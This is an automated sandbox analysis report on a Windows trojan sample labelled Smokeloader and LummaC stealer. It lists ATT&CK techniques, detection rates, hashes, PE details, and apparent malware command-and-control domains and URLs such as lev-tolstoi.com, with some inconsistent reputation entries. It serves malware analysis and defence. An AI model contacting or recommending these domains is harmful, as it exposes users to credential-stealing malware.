      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
      MITRE ATT&CK matrix (a number in parentheses is the count of matched signatures for that technique):

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Process Injection (1) | Virtualization/Sandbox Evasion (1) | OS Credential Dumping | Security Software Discovery (11) | Remote Services | Screen Capture (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | PowerShell (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (1) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (11) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Clipboard Data (2) | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (4) | NTDS | System Information Discovery (22) | Distributed Component Object Model | Input Capture | Application Layer Protocol (114) | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (22) | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Antivirus detection (sample)

Source | Detection | Scanner | Label
3zg6i6Zu1u.exe | 74% | Virustotal |
3zg6i6Zu1u.exe | 79% | ReversingLabs | Win32.Trojan.Smokeloader
3zg6i6Zu1u.exe | 100% | Avira | HEUR/AGEN.1352498
3zg6i6Zu1u.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Antivirus detection (URLs)

Source | Detection | Scanner | Label
https://store.steampowered.comN | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/w | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/piGI | 100% | Avira URL Cloud | malware
https://community.fastly.steamstatic.c | 0% | Avira URL Cloud | safe
spellshagey.biz | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/7g | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/apia | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 172.67.157.254 | true | false | | high
sordid-snaked.cyou | unknown | unknown | false | | high
diffuculttan.xyz | unknown | unknown | false | | high
effecterectz.xyz | unknown | unknown | false | | high
spellshagey.biz | unknown | unknown | true | | unknown
awake-weaves.cyou | unknown | unknown | false | | high
immureprech.biz | unknown | unknown | false | | high
wrathful-jammy.cyou | unknown | unknown | false | | high
deafeninggeh.biz | unknown | unknown | false | | high
debonairnukk.xyz | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
sordid-snaked.cyou | false | | high
deafeninggeh.biz | false | | high
effecterectz.xyz | false | | high
wrathful-jammy.cyou | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
awake-weaves.cyou | false | | high
immureprech.biz | false | | high
debonairnukk.xyz | false | | high
https://lev-tolstoi.com/api | false | | high
spellshagey.biz | true | Avira URL Cloud: malware | unknown
diffuculttan.xyz | false | | high
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/legal/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://recaptcha.net3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://lev-tolstoi.com/apia3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://lev-tolstoi.com/7g3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://help.steampowered.com/3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://store.steampowered.com/account/cookiepreferences/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://store.steampowered.com/mobile3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://steamcommunity.com/3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn813zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://lev-tolstoi.com/pi3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://steamcommunity.com/profiles/76561199724331900/badges3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs
IP              Domain              Country        ASN    ASN Name         Malicious
172.67.157.254  lev-tolstoi.com     United States  13335  CLOUDFLARENETUS  false
23.55.153.106   steamcommunity.com  United States  20940  AKAMAI-ASN1EU    false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580303
Start date and time: 2024-12-24 09:04:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3zg6i6Zu1u.exe (renamed because the original name is a hash value)
Original Sample Name: 996aa4b544e08689f305d751c60835c7.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@2/5@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 20
• Number of non-executed functions: 212
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.190.181.0, 20.12.23.50
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
Time      Type             Description
03:05:05  API Interceptor  9x Sleep call for process: 3zg6i6Zu1u.exe modified
03:05:27  API Interceptor  1x Sleep call for process: WerFault.exe modified
Match            Associated Sample Name / URL   Detection   Threat Name
172.67.157.254   L5Kgf2Tvkc.exe                 malicious   LummaC
                 fkawMJ7FH8.exe                 malicious   LummaC, Amadey, LummaC Stealer, RedLine, Stealc
                 Bire1g8ahY.exe                 malicious   LummaC, Stealc
                 NfwBtCx5PR.exe                 malicious   LummaC
                 pJRiqnTih0.exe                 malicious   LummaC
                 xxLuwS60RS.exe                 malicious   LummaC
                 9pyUjy2elE.exe                 malicious   LummaC
                 NQbg5Ht2hW.exe                 malicious   LummaC
                 BZuk2UI1RC.exe                 malicious   LummaC
                 EI3TafelpV.exe                 malicious   LummaC
23.55.153.106    oiF7u78bY2.exe                 malicious   LummaC
                 L5Kgf2Tvkc.exe                 malicious   LummaC
                 jSFUzuYPG9.exe                 malicious   LummaC
                 HK8IIasL9i.exe                 malicious   LummaC
                 OGBLsboKIF.exe                 malicious   LummaC
                 NfwBtCx5PR.exe                 malicious   LummaC
                 pJRiqnTih0.exe                 malicious   LummaC
                 5XXofntDiN.exe                 malicious   LummaC
                 xxLuwS60RS.exe                 malicious   LummaC
                 5RjjCWZAVv.exe                 malicious   LummaC
Match                Associated Sample Name / URL   Detection   Threat Name                                        Context
lev-tolstoi.com      oiF7u78bY2.exe                 malicious   LummaC                                             104.21.66.86
                     L5Kgf2Tvkc.exe                 malicious   LummaC                                             172.67.157.254
                     fkawMJ7FH8.exe                 malicious   LummaC, Amadey, LummaC Stealer, RedLine, Stealc    172.67.157.254
                     LNn56KMkEE.exe                 malicious   LummaC                                             104.21.66.86
                     BVGvbpplT8.exe                 malicious   LummaC, Stealc                                     104.21.66.86
                     mgEXk8ip26.exe                 malicious   LummaC                                             104.21.66.86
                     Bire1g8ahY.exe                 malicious   LummaC, Stealc                                     172.67.157.254
                     jSFUzuYPG9.exe                 malicious   LummaC                                             104.21.66.86
                     HK8IIasL9i.exe                 malicious   LummaC                                             104.21.66.86
                     NfwBtCx5PR.exe                 malicious   LummaC                                             172.67.157.254
steamcommunity.com   L5Kgf2Tvkc.exe                 malicious   LummaC                                             23.55.153.106
                     fkawMJ7FH8.exe                 malicious   LummaC, Amadey, LummaC Stealer, RedLine, Stealc    104.121.10.34
                     2ZsJ2iP8Q2.exe                 malicious   LummaC                                             104.102.49.254
                     LopCYSStr3.exe                 malicious   LummaC                                             104.102.49.254
                     LNn56KMkEE.exe                 malicious   LummaC                                             104.102.49.254
                     YYjRtxS70h.exe                 malicious   Unknown                                            104.102.49.254
                     VBHyEN96Pw.exe                 malicious   LummaC                                             104.102.49.254
                     BVGvbpplT8.exe                 malicious   LummaC, Stealc                                     104.102.49.254
                     613vKYuY2S.exe                 malicious   LummaC                                             104.102.49.254
                     YYjRtxS70h.exe                 malicious   Unknown                                            104.102.49.254
Match             Associated Sample Name / URL                                                         Detection   Threat Name       Context
AKAMAI-ASN1EU     oiF7u78bY2.exe                                                                       malicious   LummaC            23.55.153.106
                  Gq48hjKhZf.exe                                                                       malicious   LodaRAT           172.232.216.250
                  L5Kgf2Tvkc.exe                                                                       malicious   LummaC            23.55.153.106
                  7uJ95NO82G.exe                                                                       malicious   LodaRAT           172.232.216.250
                  nabx86.elf                                                                           malicious   Unknown           23.7.216.65
                  Violated Heroine_91zbZ-1.exe                                                         malicious   Unknown           184.85.182.130
                  [External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.eml               malicious   Unknown           23.195.39.65
                  ChoForgot.exe                                                                        malicious   Vidar             23.219.82.25
                  nTyPEbq9wQ.lnk                                                                       malicious   Unknown           104.126.116.105
                  jSFUzuYPG9.exe                                                                       malicious   LummaC            23.55.153.106
CLOUDFLARENETUS   oiF7u78bY2.exe                                                                       malicious   LummaC            104.21.66.86
                  L5Kgf2Tvkc.exe                                                                       malicious   LummaC            172.67.157.254
                  LVDdWBGnVE.exe                                                                       malicious   LummaC Stealer    104.21.63.229
                  O5Vg1CJsxN.exe                                                                       malicious   LummaC, Stealc    104.21.36.201
                  2oM46LNCOo.exe                                                                       malicious   LummaC            172.67.199.72
                  J18uCKmoAw.exe                                                                       malicious   LummaC            172.67.209.202
                  y001L6lEK4.exe                                                                       malicious   LummaC, Stealc    172.67.199.72
                  tTGxYWtjG5.exe                                                                       malicious   LummaC            172.67.199.72
                  iaLId0uLUw.exe                                                                       malicious   LummaC            172.67.199.72
                  4W3cB5WEYH.exe                                                                       malicious   LummaC            104.21.36.201
Match                              Associated Sample Name / URL   Detection   Threat Name       Context
a0e9f5d64349fb13191bc781f81f42e1   oiF7u78bY2.exe                 malicious   LummaC            172.67.157.254, 23.55.153.106
                                   L5Kgf2Tvkc.exe                 malicious   LummaC            172.67.157.254, 23.55.153.106
                                   LVDdWBGnVE.exe                 malicious   LummaC Stealer    172.67.157.254, 23.55.153.106
                                   O5Vg1CJsxN.exe                 malicious   LummaC, Stealc    172.67.157.254, 23.55.153.106
                                   2oM46LNCOo.exe                 malicious   LummaC            172.67.157.254, 23.55.153.106
                                   J18uCKmoAw.exe                 malicious   LummaC            172.67.157.254, 23.55.153.106
                                   y001L6lEK4.exe                 malicious   LummaC, Stealc    172.67.157.254, 23.55.153.106
                                                                                                                                                                                                                                                        tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.5832866726116527
Encrypted: false
SSDEEP: 96:i6JjjJ+CejUpLOsQhMov7JfqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAPf/0:5w1jQLOD0WbkQzuiF3Z24IO8b
MD5: 7DADAF2D5D22F5B8128CF98C558A9811
SHA1: 0F3E42A0C0F54B6B014836CF84AF3B21E241C071
SHA-256: D004E26561A6C6E5C68B615D6198E21ECA3D5E47BDD99B9A6567DD1F096E4C16
SHA-512: 68A9DAD4589FE7C24014714E05D797DA8FED88B0F9335381E65BD8DDD4EFC51D2104D2F7D8E7A0F8C66DF18D816702E2CFC5D8D6F6715287ED6706F33FE9E081
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8314
Entropy (8bit): 3.68210632616567
Encrypted: false
SSDEEP: 192:R6l7wVeJ716Kq6YSISU95wrgmfhWpDT89bwMsfqQm:R6lXJJ6p6YtSU95wrgmfhPwffc
MD5: C7DC830C2F02EC1A302B431A2CC588BB
SHA1: 080370CDD057FE077D123CC7BCF9DC1154914A0E
SHA-256: 99D0B5C7F856D57635A21892C1E6CC98D99DA0B32F323794344C0C7E0003782E
SHA-512: 29459E024BFF8485972764C714EB3D570874289DFD6811B6E8B3B34802F3EA2317C3A5CB02DB4AC8869640C055F658DE97E7A4A8239C9D9F793D2BCB2B764342
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4578
Entropy (8bit): 4.454300351532152
Encrypted: false
SSDEEP: 48:cvIwWl8zsXiJg77aI9NaWpW8VYFv5Ym8M4JTEFv+q8as3zC2d:uIjfXwI77b7VGAJOG3zC2d
MD5: 936041260A0E4DC33E6A1556E506020C
SHA1: 8E69140BE56A4ABBBE0321943F67966ABEF9FE78
SHA-256: 39B840D819A13C3095949A44877894F0F3A193414A3B29A1C75FB12FD10DECBC
SHA-512: 393DFA0B1D5ECAF32DBAEAC2041F85637C12C7522CED02967B412017721CA2F8A109B26118F2E3732910875A820EEF5401AF825BC812BFE99F7EE7907AE90AFE
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 4886
Entropy (8bit): 3.2574474468595307
Encrypted: false
SSDEEP: 96:pwpIinkXkkXckmtuWEt0QEk0QS0Qgi0QXP0QU0QaqtgwXSrCszeuzSzbxGQI5lmr:pylt7u/epmoeyOkN7Q
MD5: 81E846E10722F0C3C52918EEFE0E4D9A
SHA1: CFE5BF26C75EF3884A7437FB1CFA96F5C2F43D03
SHA-256: 8D98E84AF661C216F56D8B0FEE1F5020FA489EB5693F6FBDC32754786BD0C38F
SHA-512: 8AF4EE3B3854C96939B377ADD2D663F91C079A90449E59A5E4BE01E9B6FFC2175D28F888C136C89F4B639D0B9A6161F7887870755155B1B8D101ADD6A83E1E6E
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.372094014390956
Encrypted: false
SSDEEP: 6144:qFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNjiL:CV1QyWWI/glMM6kF7Fq
MD5: FE81BA60679030DCDC81A916D3D3ACB1
SHA1: C6971AC40C9292A5A29368000B548DAC37B6E3A8
SHA-256: D4A4F429CCCBC81324C4B82D65492A4D70D5E1C4F3D189E0622EE2FC6114CE19
SHA-512: 8C91AAE095DEB4F740F17A9C3A0D1BEFCEF82CE2D7B6C799196ADA149BCE9E6A9CF900935DC1C2DA7968B05B08C02AB0A828B160E95C4EA34248215971B7B2A1
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.593029920839553
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 3zg6i6Zu1u.exe
File size: 340'992 bytes
MD5: 996aa4b544e08689f305d751c60835c7
SHA1: 5792471be8a25d8472a84fa3967f241f776b5cba
SHA256: 5f20a76b1d382a5817af09d9c0307fbaeeae34a3e6b714e0eded2bca695bdd94
SHA512: b07872c69b2fea39be2e474511f8016ae8fb2d727f20de57b8ab9331cd478468a643f638966638a2e482dc8d27ca6c08391c1dfcf7e011ed0d40c06ccd802a3d
SSDEEP: 6144:kJ86J8nE0fJHAzCyJkGxsTByhaA+Hpnh8UMAFxvg5o3C6R:kJ86JIxfJwCmkGu/hMAPYy
                                                                                                                                                                                                                                                        TLSH:E174DF12B9F1D132EBFB5A3408B493A66ABFB8233830818F3654276E5D316C18E75747
                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........I...I...I.......K...W...T...W...]...W...%...n_..L...I...1...W...H...W...H...W...H...RichI...........................PE..L..
                                                                                                                                                                                                                                                        Icon Hash:187c7319952b2776
                                                                                                                                                                                                                                                        Entrypoint:0x4016fc
                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                        Time Stamp:0x64EC1F9B [Mon Aug 28 04:16:27 2023 UTC]
                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                        Import Hash:7e25ebcd79e0614919635825d01ef9bc
Instruction (linear disassembly from the entrypoint, 0x4016fc)
call 00007FE078BBC178h
jmp 00007FE078BB93FDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00445C48h], eax
mov dword ptr [00445C44h], ecx
mov dword ptr [00445C40h], edx
mov dword ptr [00445C3Ch], ebx
mov dword ptr [00445C38h], esi
mov dword ptr [00445C34h], edi
mov word ptr [00445C60h], ss
mov word ptr [00445C54h], cs
mov word ptr [00445C30h], ds
mov word ptr [00445C2Ch], es
mov word ptr [00445C28h], fs
mov word ptr [00445C24h], gs
pushfd
pop dword ptr [00445C58h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00445C4Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00445C50h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00445C5Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00445B98h], 00010001h
mov eax, dword ptr [00445C50h]
mov dword ptr [00445B4Ch], eax
mov dword ptr [00445B40h], C0000409h
mov dword ptr [00445B44h], 00000001h
mov eax, dword ptr [00443008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0044300Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000D8h]

Reading the listing: the entrypoint itself is only the first two instructions, the Visual Studio 2008 CRT startup stub (a call to the security-cookie initialiser followed by a jmp to the CRT main routine). The disassembler then continues linearly into the function that happens to follow. That function saves every general-purpose and segment register and the flags into a global CONTEXT record, sets ContextFlags to 00010001h (CONTEXT_CONTROL), writes exception code C0000409h (STATUS_STACK_BUFFER_OVERRUN) with flags 1 (EXCEPTION_NONCONTINUABLE), and calls out through an import pointer: this is the MSVC /GS stack-cookie failure handler from the CRT, not the sample's own unpacking or stealer logic, so it should not be mistaken for the malicious code path.
Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x418fc          0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x421000         0xaba8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x40000          0x1a4         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x3ee9c       0x3f000   41a0a7395288681d6c538d4023b7f58d  False     0.8038659474206349  data       7.366149067404338   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
